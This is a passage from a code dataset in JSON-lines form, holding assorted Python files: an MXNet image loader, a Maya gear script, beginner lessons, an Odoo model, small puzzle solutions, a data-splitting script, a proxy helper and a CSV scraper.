else:\n data['forms'] = dict(\n [(f.channel.uid, f.adapted_configuration) for f in forms]\n )\n\n return self.response_as_json(data)\n\n @responder(url_type=RequestURL)\n def reconcile_task(self, request):\n task_id = request.json.get('task_id')\n solution = request.json.get('data')\n if not task_id or not solution:\n raise HTTPBadRequest(\n 'Must specify both task_id and data',\n )\n\n user = self.get_user(request)\n task = user.get_object_by_uid(task_id, 'task')\n if not task:\n raise HTTPBadRequest(\n 'Specified task_id does not exist',\n )\n if not task.can_reconcile:\n response = {\n 'status': 'ERROR',\n 'details': 'Cannot reconcile specified task_id',\n }\n\n else:\n try:\n task.reconcile(user, solution)\n except InstrumentError as exc:\n response = {\n 'status': 'ERROR',\n 'details': exc.message,\n }\n else:\n response = {\n 'status': 'SUCCESS',\n }\n\n return 
self.response_as_json(response)\n\n","sub_path":"src/rex.acquire_actions/src/rex/acquire_actions/reconcile_task.py","file_name":"reconcile_task.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"83148110","text":"import pandas as pd\nfrom matplotlib.pyplot import imread\nimport glob\nfrom mxnet import gluon\nimport numpy as np\nimport os\n\nfrom mxnet.gluon.data import dataset\nimport warnings\nfrom mxnet import image\n\n\ndef get_list_dir_in_folder(dir):\n sub_dir = [o for o in os.listdir(dir) if os.path.isdir(os.path.join(dir, o))]\n return sub_dir\n\ndef get_list_file_in_folder(dir, ext='jpg'):\n included_extensions = [ext]\n file_names = [fn for fn in os.listdir(dir)\n if any(fn.endswith(ext) for ext in included_extensions)]\n return file_names\n\ndef create_class_folder_inside_dir(dir, num_class=103):\n for i in range(num_class):\n class_dir=os.path.join(dir,str(i))\n if not os.path.exists(class_dir):\n os.makedirs(class_dir)\n\ndef get_string_from_file(file_path):\n text = [line.rstrip('\\n') for line in open(file_path)]\n return text\n\nclass ImageFolderDatasetCustomized(dataset.Dataset):\n \"\"\"A dataset for loading image files stored in a folder structure.\n\n like::\n\n root/car/0001.jpg\n root/car/xxxa.jpg\n root/car/yyyb.jpg\n root/bus/123.jpg\n root/bus/023.jpg\n root/bus/wwww.jpg\n\n Parameters\n ----------\n root : str\n Path to root directory.\n flag : {0, 1}, default 1\n If 0, always convert loaded images to greyscale (1 channel).\n If 1, always convert loaded images to colored (3 channels).\n transform : callable, default None\n A function that takes data and label and transforms them::\n\n transform = lambda data, label: (data.astype(np.float32)/255, label)\n\n Attributes\n ----------\n synsets : list\n List of class names. `synsets[i]` is the name for the integer label `i`\n items : list of tuples\n List of all images in (filename, label) pairs.\n \"\"\"\n def __init__(self, root, flag=1, transform=None, sub_class_inside=True):\n self._root = os.path.expanduser(root)\n self._flag = flag\n self._transform = transform\n self._exts = ['.jpg', '.jpeg', '.png']\n self._sub_class = sub_class_inside\n self._list_images(self._root)\n\n def _list_images(self, root):\n self.synsets = []\n self.items = []\n\n if(self._sub_class):\n class_dirs = os.listdir(root)\n try:\n class_dirs.sort(key=int)\n except ValueError:\n class_dirs = sorted(os.listdir(root))\n pass\n\n for folder in class_dirs:\n path = os.path.join(root, folder)\n if not os.path.isdir(path):\n warnings.warn('Ignoring %s, which is not a directory.' % path, stacklevel=3)\n continue\n label = len(self.synsets)\n self.synsets.append(folder)\n for filename in sorted(os.listdir(path)):\n filename = os.path.join(path, filename)\n ext = os.path.splitext(filename)[1]\n if ext.lower() not in self._exts:\n warnings.warn('Ignoring %s of type %s. Only support %s' % (\n filename, ext, ', '.join(self._exts)))\n continue\n self.items.append((filename, label))\n else:\n for filename in sorted(os.listdir(root)):\n raw_name=(os.path.splitext(filename)[0]).split('_')\n length=len(raw_name)\n name_wo_ext = int(raw_name[length-1])\n filename = os.path.join(root, filename)\n ext = os.path.splitext(filename)[1]\n if ext.lower() not in self._exts:\n warnings.warn('Ignoring %s of type %s. 
Only support %s' % (\n filename, ext, ', '.join(self._exts)))\n continue\n self.items.append((filename, name_wo_ext))\n\n\n def __getitem__(self, idx):\n img = image.imread(self.items[idx][0], self._flag)\n label = self.items[idx][1]\n if self._transform is not None:\n return self._transform(img, label)\n if(self._sub_class):\n name = os.path.basename(self.items[idx][0])\n raw_name = (os.path.splitext(name)[0]).split('_')\n length = len(raw_name)\n name_wo_ext = int(raw_name[length - 1])\n return img, label, name_wo_ext\n else:\n return img, self.items[idx][1]\n\n def __len__(self):\n return len(self.items)\n","sub_path":"scripts/classification/arm_project/utils_classification.py","file_name":"utils_classification.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
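A usage sketch for ImageFolderDatasetCustomized, assuming a class-per-folder tree under ./train and images that already share a shape (or a transform that resizes them), since gluon's default batchifier stacks fixed-size arrays:

from mxnet.gluon.data import DataLoader

dataset = ImageFolderDatasetCustomized('./train', sub_class_inside=True)
loader = DataLoader(dataset, batch_size=32, shuffle=True)
for imgs, labels, ids in loader:  # __getitem__ yields (image, label, file id)
    print(imgs.shape, labels.shape)
    break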
+{"seq_id":"478829447","text":"from threading import Thread,Lock\nfrom time import sleep\nimport sys,os\nip=1\na=0\ndef fun1(ips):\n os.system(\"./thread_c_prog ifconfig >ipcon/de\"+str(ips)+\".txt\")\nthreads=[]\nfor i in range(0,10000):\n threads.append(Thread(target=fun1,args=(i,)))\nfor j in threads:\n j.start()\nfor t in threads:\n t.join()\n","sub_path":"c_with_thread.py","file_name":"c_with_thread.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"577872080","text":"import maya.cmds as cmds\n\n\"\"\"\n# Using: Maya API 1.0, Python 2.7.11 \n# Author: Timothy Stoltzner Rasmussen\n\"\"\"\n\n\nclass Gear(object):\n\n standard_length = None\n standard_teeth = None\n\n def __init__(self, standard_teeth=10, standard_length=0.3):\n \"\"\"\n To use the gear class you need to assign the teeth amount and the length.\n It will otherwise use the standard defined values.\n\n :param standard_teeth: Amount of gear teeth\n :param standard_length: The length of the teeth\n \"\"\"\n self.standard_teeth = standard_teeth\n self.standard_length = standard_length\n self.spans = standard_teeth * 2\n self.shape = None\n self.transform = None\n self.constructor = None\n self.extrude = None\n\n def create(self):\n\n self.create_pipe()\n\n self.make_teeth()\n\n def create_pipe(self):\n # Setting the shape and transform to the class variables\n self.transform, self.shape = cmds.polyPipe(subdivisionsAxis=self.spans)\n\n # Finding the polyPipe node and set it equal to the constructor\n for node in cmds.listConnections(\"{0}.inMesh\".format(self.transform)):\n if cmds.objectType(node) == \"polyPipe\":\n self.constructor = node\n break\n\n def make_teeth(self):\n # Clearing the selection to ensure, selection is clean.\n cmds.select(clear=True)\n\n # Creating a list to select all the faces that will become the teeth.\n # This will return a list of numbers in the range spans * 2 to spans * 3, with steps of 2.\n side_faces = self.get_teeth_faces(self.standard_teeth)\n\n # Looping through the faces in the list of side_faces\n for face in side_faces:\n # The '%s.f[%s]' expands to something like pPipe1.f[20]\n # ADD selecting the wanted faces on the created polygonPipe.\n cmds.select(\"{0}.{1}\".format(self.transform, face), add=True)\n\n # Instead of returning a value, the extrude note will be stored onto the class\n # as a class variable\n self.extrude = cmds.polyExtrudeFacet(localTranslateZ=self.standard_length)[0]\n cmds.select(clear=True)\n\n def change_length(self, length=standard_length):\n # Because the extrude node is on the class, I can get it directly\n # By doing it like this, Maya don't need to tell what extrude note to change.\n cmds.polyExtrudeFacet(self.extrude, edit=True, ltz=length)\n\n def change_teeth(self, teeth=standard_teeth, length=standard_length):\n # By knowing what constructor is used within maya, I refer to it directly\n cmds.polyPipe(self.constructor, edit=True, sa=teeth * 2)\n # Calling modify_extrude directly\n self.modify_extrude(teeth, length)\n\n def get_teeth_faces(self, teeth=standard_teeth):\n\n spans = teeth * 2\n # Creating a list to select all the faces that will become the teeth.\n # This will return a list of numbers in the range spans * 2 to spans * 3, with steps of 2.\n side_faces = range(spans * 2, spans * 3, 2)\n\n # The list for collecting the faces\n faces = []\n\n for face in side_faces:\n faces.append(\"f[{0}]\".format(face))\n\n return faces\n\n def modify_extrude(self, teeth=standard_teeth, length=standard_length):\n faces = self.get_teeth_faces(teeth)\n\n # The extrude node has an attribute called inputComponents\n # To change it I use a simple SetAttr call instead of recreating the extrude which can be expensive\n # Read this as:\n # cmds.setAttr('extrudeNode.inputComponents', 2, 'f[1]', 'f[2]', type='componentList'\n # *args = [] = face1, face2, face3\n\n cmds.setAttr(\"{0}.inputComponents\".format(self.extrude), len(faces), *faces, type=\"componentList\")\n\n self.change_length(length)\n\n\nmy_gear1 = 
Gear()\nmy_gear1.create()\nmy_gear1.change_teeth(30, 1)\nmy_gear1.change_length(2)\n\n\n","sub_path":"Plugins/Scripts/Modeling/Gear.py","file_name":"Gear.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
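One pitfall in Gear.py: defaults such as length=standard_length bind to the class-level None when the class body executes, not to the values assigned in __init__, so change_length() called with no argument would hand None to Maya. A self-contained demonstration of the binding rule and the usual call-time fix:

class Demo(object):
    default = None  # class-level placeholder, like Gear.standard_length

    def __init__(self, default=10):
        self.default = default

    def bad(self, value=default):   # 'default' was still None at class-body time
        return value

    def good(self, value=None):     # resolve the instance value at call time
        if value is None:
            value = self.default
        return value

d = Demo()
assert d.bad() is None   # ignores the value set in __init__
assert d.good() == 10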
+{"seq_id":"574300925","text":"'''\nLesson 4\nUse it all\n'''\n\n#Here we set the variable name equal to the user's input after the prompt.\n#\\n gets a new line.\nname = input(\"Hello. What's your name?\\n\")\n\nprint(f\"Hello {name}, nice to meet you!\") # f stands for formatting and interprets anything inside {} as code.\n\n#Ask for only an integer age.\n#While statement\nwhile True:\n try:\n #Tries to convert age to an int\n age = int(input(\"How old are you?\\n\"))\n break\n #If it can't convert it loops.\n except ValueError:\n print(\"That isn't a valid age.\")\n\n#Checks if users is old enough to use discord.\n#elif is Python's else if.\nif age < 13:\n while True:\n print(\"Llama\")\nelif age >= 13:\n print(f\"Congrats {name}! You can use Discord!\")\n #Same as\n #for x in range(0,6)\n for x in [0,1,2,3,4,5]:\n print(\"Woop!\")\nelse:\n print(\"How the fuck did this happen?\")\n","sub_path":"Lesson 4/Lesson 4.py","file_name":"Lesson 4.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"77056591","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom random import randint\r\nfrom odoo import api, fields, models, _\r\n\r\n\r\nclass DepartmentCategory(models.Model):\r\n _name = \"hr.department.category\"\r\n _description = \"Department Category\"\r\n\r\n def _get_default_color(self):\r\n return randint(1, 11)\r\n\r\n name = fields.Char(string=\"Tag Name\", required=True)\r\n color = fields.Integer(string=\"Color Index\", default=_get_default_color)\r\n company_id = fields.Many2one(\r\n \"res.company\",\r\n string=\"Company\",\r\n index=True,\r\n default=lambda self: self.env.company,\r\n )\r\n department_ids = fields.Many2many(\r\n \"hr.department\",\r\n \"department_category_rel\",\r\n \"category_id\",\r\n \"dmp_id\",\r\n string=\"Departments\",\r\n )\r\n tagid = fields.Integer(\r\n string=\"WeCom Tag ID\",\r\n readonly=True,\r\n default=0,\r\n help=\"Tag ID, non negative integer. When this parameter is specified, the new tag will generate the corresponding tag ID. if it is not specified, it will be automatically increased by the current maximum ID.\",\r\n )\r\n is_wecom_category = fields.Boolean(\r\n string=\"WeCom Tag\",\r\n default=False,\r\n )\r\n\r\n _sql_constraints = [\r\n (\"name_uniq\", \"unique (name)\", \"Tag name already exists !\"),\r\n ]\r\n","sub_path":"wecom_hrm/models/hr_department_category.py","file_name":"hr_department_category.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123697554","text":"\"\"\"-----------------------------------------------------------------------------\n Cannon Weapon\n\n Fires a huge shell that bounces. Shoots out shrapnel on expiry.\n-----------------------------------------------------------------------------\"\"\"\n\nfrom ..base_weapon import Base_Weapon\nfrom ..base_projectile import Base_Projectile\nfrom modules.shockwave import play_sound\n\nclass Weapon(Base_Weapon):\n def __init__(self):\n Base_Weapon.__init__(\n self,\n mechanism_type=\"semiautomatic\",\n name=\"cannon\",\n display_name=\"Cannon\",\n projectile=Projectile,\n ammo_count=2,\n heat=80,)\n\n\nclass Projectile(Base_Projectile):\n def __init__(self, robot):\n Base_Projectile.__init__(\n self,\n robot,\n name=\"shell\",\n damage=20,\n hit_radius=20,\n velocity=20,\n life=1,)\n self.shrapnel_count = 40\n\n def on_expiry(self):\n play_sound(\"explosionbig1\")\n for i in range(self.shrapnel_count):\n projectile = Shrapnel(self.robot)\n projectile.location = self.location\n projectile.overburn = self.overburn\n self.robot.match.projectiles.append(projectile)\n\n\nclass Shrapnel(Base_Projectile):\n def __init__(self, robot):\n Base_Projectile.__init__(\n self,\n robot,\n name=\"pellet\",\n damage=4,\n hit_radius=14,\n velocity=8,\n velocity_scatter=5,\n angle_scatter=360,\n life=-1,)\n\n def move(self):\n Base_Projectile.move(self)\n self.velocity *= 0.95\n if self.velocity < 0.05:\n self.expire()\n\n\n\n\n\n","sub_path":"modules/equipment_modules/weapon_equipment/Cannon.py","file_name":"Cannon.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"51394082","text":"# https://codingcompetitions.withgoogle.com/codejam/round/0000000000051705/0000000000088231?show=progress\r\n\r\n\r\ndef calculate(n):\r\n x = 0\r\n y = 0\r\n for i in range(0,len(n)):\r\n if int(n[i]) == 4:\r\n x = x*10 + 2\r\n y = y*10 + 2\r\n else:\r\n x = x*10 + int(n[i])\r\n y = y*10\r\n return x, y\r\n \r\n\r\n\r\n# input() reads a string with a line of input, stripping the ' ' (newline) at the end.\r\n# This is all you need for most Code Jam problems.\r\nt = int(input()) # read a line with a single integer\r\n\r\nfor i in range(1, t + 1):\r\n n = input()\r\n x, y = calculate(n)\r\n\r\n print(\"Case #{}: {} {}\".format(i, x, y))\r\n \r\n ","sub_path":"2019/Qualification/ForegoneSolution.py","file_name":"ForegoneSolution.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596931042","text":"# Made by Neal C (nealpointerexception)\n# I do not claim rights to any of the used libraries \nimport openpyxl\n# import openpyxl lib for parsing xl files\n\n# function to findout premium of values\n# correct name should be findPremium -- will add in V1.1 +GUI\n\n# params are dictionary , index, buy or sell, how many shares\n#V1.1 -- (dict, index, choice, shares)\ndef parseValues(dict, key, do, quantity):\n # take the dictionary and load the key value into a float variable\n value = float(dict[key])\n # if selling multiply by -1\n # formula -- value x shares x (1 or -1)\n if(do =='sell'):\n return (value*(quantity*(-1)))\n else:\n return(value*quantity)\n\n\n\n# load work book and store as .Workbook\nwhile(True):\n try:\n # ask user for the name of the file\n fileName = raw_input(\"Please enter the full path to your file or file name(e.g User/nealc/Desktop/fileName or fileName):\\n\")\n workbook = openpyxl.load_workbook(fileName + '.xlsx')\n break\n except(IOError):\n print(\"Oops! It seem that this file doesn't exist!\")\n\n\n\nmainSheet = workbook.get_sheet_by_name('Sheet1')\n# get required sheet from wkbk using sheetname\n\ndictionary = {}\n# created empty dict to hold row/colomn vals\navailKeys = []\n# this is the main for loop that runs through weach row of the file the dictionary holds the key colum and assign the corresponding value from column 2\nfor x in range(1, mainSheet.max_row + 1):\n # in dict add every value in the first column and convert that into strings. make values equal to the corresponding num in second column\n dictionary[str(mainSheet.cell(row=x, column=1).value)] = str(mainSheet.cell(row=x, column=2).value)\n # make list of keys availible to the user\n availKeys.append(str(mainSheet.cell(row=x, column=1).value))\n\n# make containers for list final values and final string outputs\nparsedListVals = []\nparsedListStrings = []\n\n# ask user for values to parse\nprint(\"Enter values to use. 
Enter 'done' when complete\")\n# main user input loop starts here\n''' PATCH: automaticly set a 3 index limit (V1.0.1 patch)'''\nfor x in range(0, 3, 1):\n\n # mistype prevention system - while loops\n while(True):\n userKey = raw_input(\"Index:\\n\")\n if (userKey.lower() == 'done'):\n break\n # check if the entered value exist\n elif(userKey in availKeys):\n break\n else:\n print(\"Index does not exist!\")\n\n\n while(True):\n userVerb = raw_input(\"buy or sell: \\n\")\n if(userVerb.lower() == 'buy' or userVerb.lower() == 'sell'):\n break\n else:\n print(\"Invalid Input!\")\n\n\n userQuantity = input(\"Enter quantity amount: \\n\")\n\n\n print(\"\\n\")\n\n # string formatting for output - make string append to parsedListStrings\n string = ('If you ' + userVerb+ ' '+ str(userQuantity)+ ' shares of index value: ' + userKey + ' the premium will be: ')\n # append the final net value to parsed list vals\n parsedListVals.append(parseValues(dictionary,userKey,userVerb,userQuantity))\n\n parsedListStrings.append(string + str(parseValues(dictionary,userKey,userVerb,userQuantity)))\n\nprint('\\n\\n')\n# print out all values in StringList\nfor x in parsedListStrings:\n print(x)\n\n# print all list values by adding up all the values in the final list thing lol\nprint(\"The net amount will be: \"+ str(sum(parsedListVals)))\n\n'''PATCH: bugfix V1.0.1'''\nraw_input(\"\\nPress Enter to exit\")\n","sub_path":"NetPredict-V1.0/NetPredict-V1_0.py","file_name":"NetPredict-V1_0.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497269321","text":"'''\nCreated on 2016. 10. 1.\n\n@author: Administrator\n'''\n\ndef fileWrite():\n print('file write...')\n fp = open('test.txt', 'w')\n fp.write('kor\\nea')\n fp.close()\n \ndef fileRead():\n print('file read...')\n fp = open('test.txt','r')\n rd = fp.read()\n fp.close()\n print(rd)\n \nif __name__ == '__main__':\n fileWrite()\n fileRead()","sub_path":"fileTest1.py","file_name":"fileTest1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"313761945","text":"import logging\r\nimport os\r\nimport datetime\r\nimport cStringIO\r\n\r\n\r\ntry:\r\n from scheduledfeeds.messaging import dispatch_archive_event\r\n from scheduledfeeds.utils import get_unique_filename\r\n from scheduledfeeds.utils import get_archive_filename \r\nexcept:\r\n pass\r\n\r\nfrom kew.pe.utils.emailutil import send_email\r\nfrom kew.pe.utils.ioservice import IOService\r\n\r\nclass DailyArchive(IOService):\r\n \"\"\" Class representing the daily archive ioservice.\"\"\"\r\n \r\n #NB all defaults are handled in DailyArchiveFeed\r\n def __init__(self, props, working_path, asofdate, lib_path, java_path):\r\n \r\n datetoday = datetime.date.today()\r\n self.asofdate = asofdate\r\n \r\n working_path = os.path.join(working_path, datetoday.strftime(\"%Y%m%d\"), \"dailyarchive\")\r\n try:\r\n os.makedirs(working_path)\r\n except:\r\n pass\r\n \r\n self.log_file = os.path.join(working_path, \"%s_daily_archive.log\" % self.asofdate)\r\n self.input_file = os.path.join(working_path, \"%s_daily_archive_input.txt\" % self.asofdate)\r\n self.output_file = os.path.join(working_path, \"%s_daily_archive_output.csv\" % self.asofdate)\r\n \r\n IOService.__init__(self,\r\n service=\"runBatchCmd\",\r\n props=props,\r\n input_file=self.input_file,\r\n output_file=self.output_file,\r\n log_file=self.log_file,\r\n outDelim=\"|\",\r\n columms=None,\r\n lib_path=lib_path,\r\n java_path=java_path,\r\n trans=None,\r\n aggreg=False)\r\n \r\n def _buildInputfile(self):\r\n \r\n logging.info(\"Building input file %s\" % self.input_file)\r\n \r\n outstring = cStringIO.StringIO()\r\n # Replace the date keys in the input file, with the correct date range\r\n lines = ['batchCommand,args',\r\n 'archiveCurrency,',\r\n 'archiveMarks,-portfolios archive_all -overrideMarks ALL -markConstituents Y -priceSource LIVE -markUnderlyings Y',\r\n 'archiveYieldCurveScenario, -scenarioName DEFAULT -extension KEW -save',\r\n 'archiveMarks,-portfolios archive_currency -overrideMarks ALL -markConstituents Y -priceSource ASOF -markUnderlyings Y -asof {}'.format(self.asofdate.strftime(\"%Y%m%d\")),\r\n '']\r\n outstring.write(\"\\n\".join(lines))\r\n outfile = file(self.input_file, \"wb\")\r\n outfile.write(outstring.getvalue())\r\n outfile.close()\r\n \r\n def run(self, retry, smtpServer, emailFrom, emailTo, archive_file):\r\n \r\n self._buildInputfile()\r\n IOService.run(self, retry)\r\n \r\n if not os.path.exists(self.output_file):\r\n logging.warning(\"The Daily Archiving failed, missing output file\")\r\n subject = 'Daily Archiving Failed'\r\n body = 'The Daily Archiving failed with error: missing output file. Imagine logfile attached if it exists.'\r\n send_email(smtpServer, emailFrom, emailTo, subject, body, {os.path.dirname(self.log_file):os.path.basename(self.log_file)})\r\n return\r\n \r\n paths = os.path.split(archive_file)\r\n archive_file = os.path.join(paths[0], \"%s_%s\" % (self.asofdate, paths[1]))\r\n \r\n outputFile= file(archive_file, 'wb')\r\n for tempFile in [self.output_file]:\r\n logging.info('Reading part file %s' % tempFile)\r\n tfile = file(tempFile, 'rb')\r\n line = tfile.readline() \r\n while line:\r\n outputFile.write(line)\r\n line = tfile.readline()\r\n outputFile.close()\r\n \r\n logging.info(\"Done\") \r\n return archive_file\r\n \r\nclass DailyArchiveFeed(object):\r\n \"\"\" Feed to call the daily archiving. 
\r\n \r\n asofdate format: YYYYMMDD\r\n \"\"\"\r\n \r\n def __init__(self, path, filename, props, working_path, asofdate=None, retry=1, java_path=\"C:\\Program Files\\Imagine Software\\its\\jre\\bin\",\r\n lib_path=\"C:\\Program Files\\Imagine Software\\its\\Lib\", email_to=\"monitors@kewcapital.com\", smtp_server=\"KC-LN-VS35-PROD1:1025\"):\r\n \r\n self.path = os.path.abspath(path)\r\n \r\n datetoday = datetime.date.today()\r\n if asofdate and isinstance(asofdate, basestring):\r\n asofdate = datetime.datetime.strptime(asofdate, '%Y%m%d').date()\r\n else:\r\n asofdate = datetoday\r\n \r\n self.filename = os.path.abspath(get_archive_filename(self.path, filename, datetoday, 'imagine_maintenance'))\r\n \r\n self.ios = DailyArchive(props = props,\r\n working_path=working_path,\r\n asofdate=asofdate,\r\n java_path=java_path,\r\n lib_path=lib_path)\r\n \r\n try:\r\n self.retry = int(retry)\r\n except:\r\n self.retry = 0\r\n self.smtp_server = smtp_server\r\n self.email_from = 'reportingdb@kewcapital.com'\r\n self.email_to = email_to.split(',')\r\n \r\n def run(self):\r\n self.filename = self.ios.run(self.retry, self.smtp_server, self.email_from, self.email_to, self.filename)\r\n \r\n message = 'created %s' % self.filename\r\n dispatch_archive_event(sender = self,\r\n path = self.filename,\r\n rpath = None,\r\n source = 'imagine_maintenance',\r\n message = message)\r\n return self.filename\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"src/kew/pe/plugins/feeds/dailyArchive.py","file_name":"dailyArchive.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"251434345","text":"\"\"\" split data for training \"\"\"\nimport tensorflow as tf\n\ntf.app.flags.DEFINE_string(\"infile\", \"\", \"Raw data path\")\nFLAGS = tf.app.flags.FLAGS\n\n\ndef addsuffix(str,suffix):\n pieces = str.split('.')\n pieces[-2] += suffix\n return '.'.join(pieces)\n\n\ndef main(_):\n with open(FLAGS.infile, \"r\", encoding='utf-8', errors='ignore') as infile:\n lines = list(infile)\n count = len(lines)\n train = []\n val = []\n test = []\n valmark = int(.8*count)\n testmark = int(.9*count)\n for i, line in enumerate(lines):\n line = line.rstrip().lstrip()\n if i < valmark:\n train.append(line)\n elif i < testmark:\n val.append(line)\n else:\n test.append(line)\n with open(addsuffix(FLAGS.infile,'_train'), 'w') as f:\n for line in train:\n f.write('%s\\n' % line)\n with open(addsuffix(FLAGS.infile,'_val'), 'w') as f:\n for line in val:\n f.write('%s\\n' % line)\n with open(addsuffix(FLAGS.infile,'_test'), 'w') as f:\n for line in test:\n f.write('%s\\n' % line)\n\nif __name__ == \"__main__\":\n tf.app.run()\n\n\n\n\n\n\n\n\n\n","sub_path":"splitfile.py","file_name":"splitfile.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131697695","text":"from mongoengine import Document\nfrom mongoengine.fields import (\n DateTimeField, ReferenceField, StringField,\n)\nclass StudentName(Document):\n meta = {'collection': 'student_name'}\n name = StringField()\n\nclass Courses(Document):\n \"\"\"list of courses taken\"\"\"\n meta = {'collection': 'courses'}\n name = StringField()\n\nclass Student(Document):\n \"\"\"docstring fos Student\"\"\"\n meta= {'collection':'student'}\n student_name = ReferenceField(StudentName)\n courses = ReferenceField(Courses)\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"430599003","text":"\"\"\"\n5475. 统计好三元组\n\"\"\"\n\n\nclass Solution:\n def countGoodTriplets(self, arr, a: int, b: int, c: int) -> int:\n cnt = 0\n for i in range(len(arr) - 2):\n for j in range(i + 1, len(arr) - 1):\n if abs(arr[i] - arr[j]) <= a:\n for k in range(j + 1, len(arr)):\n if abs(arr[j] - arr[k]) <= b and abs(arr[i] - arr[k]) <= c:\n cnt += 1\n\n return cnt\n\n\nif __name__ == '__main__':\n s = Solution()\n assert (s.countGoodTriplets([3, 0, 1, 1, 9, 7], 7, 2, 3) == 4)\n assert (s.countGoodTriplets([1, 1, 2, 2, 3], 0, 0, 1) == 0)\n","sub_path":"array/5475.py","file_name":"5475.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"130076535","text":"import argparse\nimport json\nimport sys\nimport glob\nimport googleapiclient.discovery\nimport os\nimport concurrent.futures\n\n\ndef get_native_encoding_type():\n \"\"\"Returns the encoding type that matches Python's native strings.\"\"\"\n if sys.maxunicode == 65535:\n return 'UTF16'\n else:\n return 'UTF32'\n\n\ndef analyze_entities(text, encoding='UTF32'):\n body = {\n 'document': {\n 'type': 'PLAIN_TEXT',\n 'content': text,\n 'language': 'EN'\n },\n 'encoding_type': encoding,\n }\n service = googleapiclient.discovery.build('language', 'v1')\n request = service.documents().analyzeEntitySentiment(body=body)\n try:\n response = request.execute()\n except:\n response = {}\n return response\n\ncounter = 0\nresults = {}\nos.chdir(\"texts\")\nall_data = []\nfiles = glob.glob(\"*.txt\")\nfor file in files:\n\twith open(file, 'r') as myfile:\n data=myfile.read(999999).replace('\\n', '')\n all_data += [data]\n\ndata = {}\nwith concurrent.futures.ThreadPoolExecutor(max_workers=500) as executor:\n future_to_url = {executor.submit(analyze_entities, url): url for url in all_data}\n for i, future in enumerate(concurrent.futures.as_completed(future_to_url)):\n url = future_to_url[future]\n try:\n data[files[i]] = future.result()\n except Exception as exc:\n print('except')\n else:\n print(counter)\n counter += 1\n\nfrom itertools import islice\n\ndef chunks(data, SIZE=100):\n it = iter(data)\n for i in range(0, len(data), SIZE):\n yield {k:data[k] for k in islice(it, SIZE)}\n\nfor i, chunk in enumerate(chunks(data)):\n name = 'result' + str(i) + '.json'\n with open(name, 'w') as fp:\n json.dump(chunk, fp)\n\n\n\n","sub_path":"language/api/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140751464","text":"import requests\nimport random\n\n\nclass RandProxy:\n def __init__(self, types=None):\n self.token = ''\n self.url = ''\n self.proxy_list = self._proxy(types)\n\n def _header(self) -> dict:\n \"\"\"\n Requests Header Set\n \"\"\"\n return {\n 'Authorization': 'Token ' + self.token,\n }\n\n def _proxy(self, types) -> dict or None:\n \"\"\"\n API 로 모든 Proxy list 가져오기\n \"\"\"\n if types:\n url = f'{self.url}?type={types}'\n else:\n url = self.url\n\n try:\n res = requests.get(url, headers=self._header(), timeout=5)\n except requests.RequestException:\n res = None\n else:\n res.raise_for_status()\n res = res.json()\n\n return res\n\n def get(self) -> dict:\n \"\"\"\n 전체 Proxy 중 랜덤으로 선택하여 리턴\n \"\"\"\n secure_random = random.SystemRandom()\n proxy = secure_random.choice(self.proxy_list)\n\n return {\n 'http': f'{proxy[\"protocol\"]}://{proxy[\"user\"]}:{proxy[\"password\"]}@{proxy[\"ip\"]}:{proxy[\"port\"]}'\n }\n","sub_path":"utils/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"581422789","text":"import csv\nimport numpy as np\n\n# load data from text file\ninput_file = np.genfromtxt(r'KNMI.csv', delimiter = ',', names = True, dtype = None)\n\n# create output file\noutput_file = open('KNMINEW.csv', 'w')\n\n# call up writer\nwriter = csv.writer(output_file)\n\ni = 0\n\n# iterate over each row\nfor rows in b:\n # get year and split and concatenate into correct format\n date = b['YYYYMMDD'][i]\n date = str(date)\n year = date[:4]\n month = date[4:6]\n day = date[6:8]\n realdate = year+'/'+month+'/'+day\n\n # get temperature\n temperature = b['TX'][i]\n\n # write into a new file\n writer.writerow([realdate, temperature])\n i += 1\n","sub_path":"Homework/Week 3/csvscraper.py","file_name":"csvscraper.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
